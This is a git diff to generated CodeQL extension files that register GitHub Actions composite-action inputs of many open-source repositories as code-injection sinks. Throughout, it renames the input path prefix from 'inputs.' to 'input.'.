a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml index ed954bf6f978..4532947bc485 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["spring-projects/spring-boot", "*", "inputs.run-name", "code-injection", "generated"] - - ["spring-projects/spring-boot", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file + - ["spring-projects/spring-boot", "*", "input.run-name", "code-injection", "generated"] + - ["spring-projects/spring-boot", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml index 47aebb458258..518a27d9afc5 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["spring-projects/spring-framework", "*", "inputs.run-name", "code-injection", "generated"] - - ["spring-projects/spring-framework", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file + - ["spring-projects/spring-framework", "*", "input.run-name", "code-injection", "generated"] + - ["spring-projects/spring-framework", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml index 28935d7a98bf..bb21bcda68de 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["spring-projects/spring-graphql", "*", "inputs.run-name", "code-injection", "generated"] - - ["spring-projects/spring-graphql", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file + - ["spring-projects/spring-graphql", "*", "input.run-name", "code-injection", "generated"] + - ["spring-projects/spring-graphql", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml index 2ba9ff355e21..5f81d9bd4061 100644 --- a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml +++ b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["square/workflow-kotlin", "*", "inputs.commit-message", "code-injection", "generated"] - - ["square/workflow-kotlin", "*", "inputs.fix-task", "code-injection", "generated"] - - ["square/workflow-kotlin", "*", "inputs.personal-access-token", "code-injection", "generated"] \ No newline at end of file + - ["square/workflow-kotlin", "*", "input.commit-message", "code-injection", "generated"] + - ["square/workflow-kotlin", "*", "input.fix-task", "code-injection", "generated"] + - ["square/workflow-kotlin", "*", "input.personal-access-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml index 530cc68ca4b3..f8fe2344d0a3 100644 --- a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml +++ b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["stefanprodan/podinfo", "*", "inputs.version", "code-injection", "generated"] - - ["stefanprodan/podinfo", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file + - ["stefanprodan/podinfo", "*", "input.version", "code-injection", "generated"] + - ["stefanprodan/podinfo", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml index e75197656f56..377e439049c8 100644 --- a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml +++ b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["stellar/go", "*", "inputs.go-version", "code-injection", "generated"] \ No newline at end of file + - ["stellar/go", "*", "input.go-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml index 21ea7ef13a98..1f087287d257 100644 --- a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["streetsidesoftware/cspell", "*", "inputs.name", "code-injection", "generated"] + - ["streetsidesoftware/cspell", "*", "input.name", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml index e6d2a79b8477..7f317ddad8e6 100644 --- a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml +++ b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["subquery/subql", "*", "inputs.package-path", "code-injection", "generated"] \ No newline at end of file + - ["subquery/subql", "*", "input.package-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml index ffd74df05e2c..b1a9ea20344f 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["swagger-api/swagger-codegen", "*", "inputs.options", "code-injection", "generated"] - - ["swagger-api/swagger-codegen", "*", "inputs.spec-url", "code-injection", "generated"] - - ["swagger-api/swagger-codegen", "*", "inputs.language", "code-injection", "generated"] - - ["swagger-api/swagger-codegen", "*", "inputs.job-name", "code-injection", "generated"] - - ["swagger-api/swagger-codegen", "*", "inputs.build-commands", "code-injection", "generated"] - - ["swagger-api/swagger-codegen", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["swagger-api/swagger-codegen", "*", "input.options", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "input.spec-url", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "input.language", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "input.job-name", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "input.build-commands", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml index f476d7160f62..37e39efd2433 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["swagger-api/swagger-parser", "*", "inputs.logsPath", "code-injection", "generated"] - - ["swagger-api/swagger-parser", "*", "inputs.parserSpecPath", "code-injection", "generated"] - - ["swagger-api/swagger-parser", "*", "inputs.serializationType", "code-injection", "generated"] - - ["swagger-api/swagger-parser", "*", "inputs.options", "code-injection", "generated"] - - ["swagger-api/swagger-parser", "*", "inputs.inputSpec", "code-injection", "generated"] - - ["swagger-api/swagger-parser", "*", "inputs.parserVersion", "code-injection", "generated"] \ No newline at end of file + - ["swagger-api/swagger-parser", "*", "input.logsPath", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "input.parserSpecPath", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "input.serializationType", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "input.options", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "input.inputSpec", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "input.parserVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml index e95dacb65a92..9569d47329fb 100644 --- a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml +++ b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tarantool/tarantool", "*", "inputs.source", "code-injection", "generated"] - - ["tarantool/tarantool", "*", "inputs.chat-id", "code-injection", "generated"] - - ["tarantool/tarantool", "*", "inputs.revision", "code-injection", "generated"] - - ["tarantool/tarantool", "*", "inputs.submodule", "code-injection", "generated"] \ No newline at end of file + - ["tarantool/tarantool", "*", "input.source", "code-injection", "generated"] + - ["tarantool/tarantool", "*", "input.chat-id", "code-injection", "generated"] + - ["tarantool/tarantool", "*", "input.revision", "code-injection", "generated"] + - ["tarantool/tarantool", "*", "input.submodule", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml index 42a9859aa230..6cf5dd84fbd7 100644 --- a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml +++ b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["telepresenceio/telepresence", "*", "inputs.release_version", "code-injection", "generated"] \ No newline at end of file + - ["telepresenceio/telepresence", "*", "input.release_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml index 029e4f95a2a4..ce09307f8fb4 100644 --- a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml +++ b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tensorflow/datasets", "*", "inputs.extras", "code-injection", "generated"] - - ["tensorflow/datasets", "*", "inputs.tf-version", "code-injection", "generated"] \ No newline at end of file + - ["tensorflow/datasets", "*", "input.extras", "code-injection", "generated"] + - ["tensorflow/datasets", "*", "input.tf-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml index 3223e185c7b3..183319e32ff8 100644 --- a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml +++ b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["texstudio-org/texstudio", "*", "inputs.file", "code-injection", "generated"] \ No newline at end of file + - ["texstudio-org/texstudio", "*", "input.file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml index 26fa1ce22b79..d8fb3f98b094 100644 --- a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml +++ b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml @@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["toeverything/affine", "*", "inputs.extra-flags", "code-injection", "generated"] - - ["toeverything/affine", "*", "inputs.nmHoistingLimits", "code-injection", "generated"] - - ["toeverything/affine", "*", "inputs.path", "code-injection", "generated"] - - ["toeverything/affine", "*", "inputs.cluster-location", "code-injection", "generated"] - - ["toeverything/affine", "*", "inputs.cluster-name", "code-injection", "generated"] - - ["toeverything/affine", "*", "inputs.gcp-project-id", "code-injection", "generated"] - - ["toeverything/affine", "*", "inputs.package", "code-injection", "generated"] - - ["toeverything/affine", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file + - ["toeverything/affine", "*", "input.extra-flags", "code-injection", "generated"] + - ["toeverything/affine", "*", "input.nmHoistingLimits", "code-injection", "generated"] + - ["toeverything/affine", "*", "input.path", "code-injection", "generated"] + - ["toeverything/affine", "*", "input.cluster-location", "code-injection", "generated"] + - ["toeverything/affine", "*", "input.cluster-name", "code-injection", "generated"] + - ["toeverything/affine", "*", "input.gcp-project-id", "code-injection", "generated"] + - ["toeverything/affine", "*", "input.package", "code-injection", "generated"] + - ["toeverything/affine", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml index a68a3372089a..c0c663e69f38 100644 --- a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml +++ b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["treeverse/lakefs", "*", "inputs.compose-flags", "code-injection", "generated"] - - ["treeverse/lakefs", "*", "inputs.compose-directory", "code-injection", "generated"] - - ["treeverse/lakefs", "*", "inputs.compose-file", "code-injection", "generated"] \ No newline at end of file + - ["treeverse/lakefs", "*", "input.compose-flags", "code-injection", "generated"] + - ["treeverse/lakefs", "*", "input.compose-directory", "code-injection", "generated"] + - ["treeverse/lakefs", "*", "input.compose-file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml index 6c874d646558..35c0d80a115b 100644 --- a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml +++ b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["trezor/trezor-firmware", "*", "inputs.lang", "code-injection", "generated"] - - ["trezor/trezor-firmware", "*", "inputs.model", "code-injection", "generated"] - - ["trezor/trezor-firmware", "*", "inputs.status", "code-injection", "generated"] - - ["trezor/trezor-firmware", "*", "inputs.full-deps", "code-injection", "generated"] \ No newline at end of file + - ["trezor/trezor-firmware", "*", "input.lang", "code-injection", "generated"] + - ["trezor/trezor-firmware", "*", "input.model", "code-injection", "generated"] + - ["trezor/trezor-firmware", "*", "input.status", "code-injection", "generated"] + - ["trezor/trezor-firmware", "*", "input.full-deps", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml index 8d339364cf3d..dc1dcff0b152 100644 --- a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml +++ b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tribler/tribler", "*", "inputs.libsodium-version", "code-injection", "generated"] - - ["tribler/tribler", "*", "inputs.command", "code-injection", "generated"] - - ["tribler/tribler", "*", "inputs.duration", "code-injection", "generated"] - - ["tribler/tribler", "*", "inputs.requirements", "code-injection", "generated"] - - ["tribler/tribler", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["tribler/tribler", "*", "input.libsodium-version", "code-injection", "generated"] + - ["tribler/tribler", "*", "input.command", "code-injection", "generated"] + - ["tribler/tribler", "*", "input.duration", "code-injection", "generated"] + - ["tribler/tribler", "*", "input.requirements", "code-injection", "generated"] + - ["tribler/tribler", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml index db6751f8ef5b..2da63c894fc4 100644 --- a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml @@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["trunk-io/trunk-action", "*", "inputs.tools", "code-injection", "generated"] - - ["trunk-io/trunk-action", "*", "inputs.post-init", "code-injection", "generated"] - - ["trunk-io/trunk-action", "*", "inputs.setup-deps", "code-injection", "generated"] - - ["trunk-io/trunk-action", "*", "inputs.label", "code-injection", "generated"] - - ["trunk-io/trunk-action", "*", "inputs.debug", "code-injection", "generated"] - - ["trunk-io/trunk-action", "*", "inputs.check-run-id", "code-injection", "generated"] - - ["trunk-io/trunk-action", "*", "inputs.check-all-mode", "code-injection", "generated"] - - ["trunk-io/trunk-action", "*", "inputs.cache-key", "code-injection", "generated"] \ No newline at end of file + - ["trunk-io/trunk-action", "*", "input.tools", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "input.post-init", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "input.setup-deps", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "input.label", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "input.debug", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "input.check-run-id", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "input.check-all-mode", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "input.cache-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml index 68959bf21024..3dc87b3ed761 100644 --- a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml +++ b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["unidata/metpy", "*", "inputs.key", "code-injection", "generated"] \ No newline at end of file + - ["unidata/metpy", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml index f8aa8480088b..94a140a9fe17 100644 --- a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml +++ b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["unstructured-io/unstructured", "*", "inputs.python-version", "code-injection", "generated"] \ No newline at end of file + - ["unstructured-io/unstructured", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml index 0f78fddcd969..d8f782746230 100644 --- a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml +++ b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["vercel/turbo", "*", "inputs.extra-flags", "code-injection", "generated"] \ No newline at end of file + - ["vercel/turbo", "*", "input.extra-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml index 9eb860b13d91..f539135bba01 100644 --- a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml +++ b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["vesoft-inc/nebula", "*", "inputs.target-path", "code-injection", "generated"] - - ["vesoft-inc/nebula", "*", "inputs.bucket", "code-injection", "generated"] - - ["vesoft-inc/nebula", "*", "inputs.key-secret", "code-injection", "generated"] - - ["vesoft-inc/nebula", "*", "inputs.key-id", "code-injection", "generated"] - - ["vesoft-inc/nebula", "*", "inputs.endpoint", "code-injection", "generated"] - - ["vesoft-inc/nebula", "*", "inputs.asset-path", "code-injection", "generated"] - - ["vesoft-inc/nebula", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file + - ["vesoft-inc/nebula", "*", "input.target-path", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "input.bucket", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "input.key-secret", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "input.key-id", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "input.endpoint", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "input.asset-path", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml index 573b256121f9..cc8a7f16492d 100644 --- a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml +++ b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["vkcom/vkui", "*", "inputs.next_version", "code-injection", "generated"] - - ["vkcom/vkui", "*", "inputs.package_name", "code-injection", "generated"] - - ["vkcom/vkui", "*", "inputs.npm_tag", "code-injection", "generated"] - - ["vkcom/vkui", "*", "inputs.prev_version", "code-injection", "generated"] - - ["vkcom/vkui", "*", "inputs.new_version", "code-injection", "generated"] - - ["vkcom/vkui", "*", "inputs.pre_id", "code-injection", "generated"] \ No newline at end of file + - ["vkcom/vkui", "*", "input.next_version", "code-injection", "generated"] + - ["vkcom/vkui", "*", "input.package_name", "code-injection", "generated"] + - ["vkcom/vkui", "*", "input.npm_tag", "code-injection", "generated"] + - ["vkcom/vkui", "*", "input.prev_version", "code-injection", "generated"] + - ["vkcom/vkui", "*", "input.new_version", "code-injection", "generated"] + - ["vkcom/vkui", "*", "input.pre_id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml index c5278340c0b1..ec1ed14fed50 100644 --- a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml +++ b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["vuetifyjs/vuetify", "*", "inputs.name", "code-injection", "generated"] - - ["vuetifyjs/vuetify", "*", "inputs.path", "code-injection", "generated"] - - ["vuetifyjs/vuetify", "*", "inputs.npm-tag", "code-injection", "generated"] - - ["vuetifyjs/vuetify", "*", "inputs.release-id", "code-injection", "generated"] \ No newline at end of file + - ["vuetifyjs/vuetify", "*", "input.name", "code-injection", "generated"] + - ["vuetifyjs/vuetify", "*", "input.path", "code-injection", "generated"] + - ["vuetifyjs/vuetify", "*", "input.npm-tag", "code-injection", "generated"] + - ["vuetifyjs/vuetify", "*", "input.release-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml index b11973cfa008..18b37d3c658b 100644 --- a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml +++ b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["wagoodman/dive", "*", "inputs.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file + - ["wagoodman/dive", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml index 1fd3ca1f0050..c1699ec6816f 100644 --- a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml +++ b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml @@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["walletconnect/walletconnectswiftv2", "*", "inputs.js-client-api-host", "code-injection", "generated"] - - ["walletconnect/walletconnectswiftv2", "*", "inputs.project-id", "code-injection", "generated"] - - ["walletconnect/walletconnectswiftv2", "*", "inputs.relay-endpoint", "code-injection", "generated"] - - ["walletconnect/walletconnectswiftv2", "*", "inputs.gm-dapp-host", "code-injection", "generated"] - - ["walletconnect/walletconnectswiftv2", "*", "inputs.gm-dapp-project-secret", "code-injection", "generated"] - - ["walletconnect/walletconnectswiftv2", "*", "inputs.gm-dapp-project-id", "code-injection", "generated"] - - ["walletconnect/walletconnectswiftv2", "*", "inputs.explorer-endpoint", "code-injection", "generated"] - - ["walletconnect/walletconnectswiftv2", "*", "inputs.notify-endpoint", "code-injection", "generated"] \ No newline at end of file + - ["walletconnect/walletconnectswiftv2", "*", "input.js-client-api-host", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "input.project-id", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "input.relay-endpoint", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "input.gm-dapp-host", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "input.gm-dapp-project-secret", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "input.gm-dapp-project-id", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "input.explorer-endpoint", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "input.notify-endpoint", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml index 727a21ac9602..0fe9b73b6deb 100644 --- a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml +++ b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["wazuh/wazuh", "*", "inputs.target", "code-injection", "generated"] - - ["wazuh/wazuh", "*", "inputs.doxygen_config", "code-injection", "generated"] - - ["wazuh/wazuh", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["wazuh/wazuh", "*", "input.target", "code-injection", "generated"] + - ["wazuh/wazuh", "*", "input.doxygen_config", "code-injection", "generated"] + - ["wazuh/wazuh", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml index fff6557dd410..27a5defa298f 100644 --- a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml +++ b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["web-infra-dev/rspack", "*", "inputs.post", "code-injection", "generated"] - - ["web-infra-dev/rspack", "*", "inputs.profile", "code-injection", "generated"] - - ["web-infra-dev/rspack", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file + - ["web-infra-dev/rspack", "*", "input.post", "code-injection", "generated"] + - ["web-infra-dev/rspack", "*", "input.profile", "code-injection", "generated"] + - ["web-infra-dev/rspack", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml index e87c7cf5c06b..05fd2667812b 100644 --- a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml +++ b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["webassembly/wabt", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file + - ["webassembly/wabt", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml index 9c556053d664..5a91e3cd32f1 100644 --- a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml +++ b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["wntrblm/nox", "*", "inputs.python-versions", "code-injection", "generated"] \ No newline at end of file + - ["wntrblm/nox", "*", "input.python-versions", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml index 6121c00ccfd3..bb632423a1c5 100644 --- a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml +++ 